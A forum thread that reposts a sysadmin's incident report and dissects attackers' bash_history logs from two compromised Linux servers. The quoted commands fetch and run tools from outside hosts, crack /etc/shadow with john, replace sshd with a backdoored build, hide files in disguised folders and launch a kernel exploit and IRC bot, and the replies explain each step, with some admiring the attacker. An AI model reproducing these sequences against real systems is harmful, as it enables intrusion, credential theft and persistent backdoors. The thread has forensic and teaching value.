THIS is how you hack a web server!

[gore]

From: steve@example.org
To: incidents@securityfocus.com
Subject: SSH compiled with backdoor

Hi!

One of my web servers was hacked on July 17, 2005. bash_history
showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it appears the
hacker came in from the website account, and did an su from there.

I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the ssh installed must have logging
turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).

Last showed:
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15
(37+11:47)
website pts/0 193.231.77.74 Sun Jul 17 17:42 - down
(00:27)
website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26
(00:20)
website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41
(01:14)

whois says:
inetnum: 193.231.77.0 - 193.231.77.255
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA

Best Regards,

Steve


----------------

[gore]

Shit forgot something:

I posted this because I thought it was very interesting and it showed a common way to hack a computer running a Unix OS.



w

The first command they ran was "w" which was probably to see who was online and if root was sitting at the console or not and OF COURSE check the uptime maybe to take a guess as to when the last reboot was. This helps find an exploit that the machine may not have installed. Though this tech works better on Windows where EVERY patch needs a reboot.


wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf

They used wget to grab a file on their own website which was a hacked version of a common application used by admin.


john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow

They remove the downloaded file so the admin doesn't find.

wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h

Editing the header file.

cd ../..
./configure --without-x
make
make install

Installing the backdoored app.

mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd

Removing the actual applications to make room for their hacked copy.

cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart

A mild **** up

w

Check if anyone is going to notice a reboot

reboot

Pow.

[zencoder]

Tight. And it shows it wasn't a script that did this...or if it was, it was interupted and manually completed. I wonder how long that took to do? Reading through it, I feel a sense of urgency for the punk. Not that it matters, really. I don't know about you guys, but if I am so paranoid that I have to run w every few minutes to see whose doing what, I need a beer, a valium, and a new line of work.

[|3lack|ce]

Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you. That's how they catch shoplifters in retail. Gotta admit the kid's good, but only if the dl'd file is untraceable (did he goto the library or school computer lab to upload it the first time out?). Else with enough log checking and cooperation he can be found.

[¤The¤Spe©ialist]

Quote:

Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you.

Quote:

I'm such an arrogant egotistical cocky self centered ****er!

Yeah, we really are 138.

[gore]

LOL!

Does this face look almost mean?

[¤The¤Spe©ialist]

Your face looks like... my ass.
Ermmm... goatse style.

Your a sexy man.
http://crime.about.com/od/history/qt...ords_gracy.htm

[catch]

And yet they didn't sanitize the bash_history?

cheers,

catch

[the_JinX]

I had something allong these lines happen to a box of a friend.. Just a 'toy' linux box..
An ssh 'knocker' found a weak user (user: print, passwd: print (that's plain stupid))

A few minutes later came the 'hacker'
Or should I say lamer.. let's disect..

.bash_history

Code:

w
passwd

changed password

Code:

w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "

A nice hard to find folder

Code:

ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte

old kernel exploit (ptrace) won't work

Code:

w
rm -rf mremap_pte
wget www.partyzone.go.ro/hide.tgz
tar xzvf hide.tgz
./hide root 0 0

Dude.. you arn't root.. that won't work

Code:

ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit

Ok.. so you installed a irc-bot as a 'normal' user behind a NAT (he could have known this won't work) while you have a valid login (with your own password)..

Code:

export PATH='.'
psybnc
ls
exit

Still won't work

Code:

export PATH='.'
crond
exit

I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..

Code:

ww

typo

Code:

w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a

Should have done that a bit earlier.. could have saved you some time

Code:

wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc

OK he found out such a bot won't work behind a NAT

Code:

wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech "..   .bot"
cd "..   .bot"
sh

And that's where the bot send enough mail to trigger the ISP to kill the connection :P

Leaving the poor 'hacker' disconnected and all the evidence of his mishaps there for us to look at...

[Cemetric]

Very nice these disections ... I like 'em for seeing how they do it ... but then again if you get the logs and can see what they did, doesn't that mean they forgot to delete their evidence??.. Like catch said ! So that gets the discussion of how good they are or they just don't care maybe.

But off course if they did it from a public computer then would the evidence matter ?
Mmm wait it might if the place were the public computer stands keeps a record of who is using it (by means of driver license etc.. but these can be fake also)... just ranting, never mind

Quote:

code:--------------------------------------------------------------------------------ww--------------------------------------------------------------------------------

I don't think it's a typo ...he got nervous and started to stotter

C.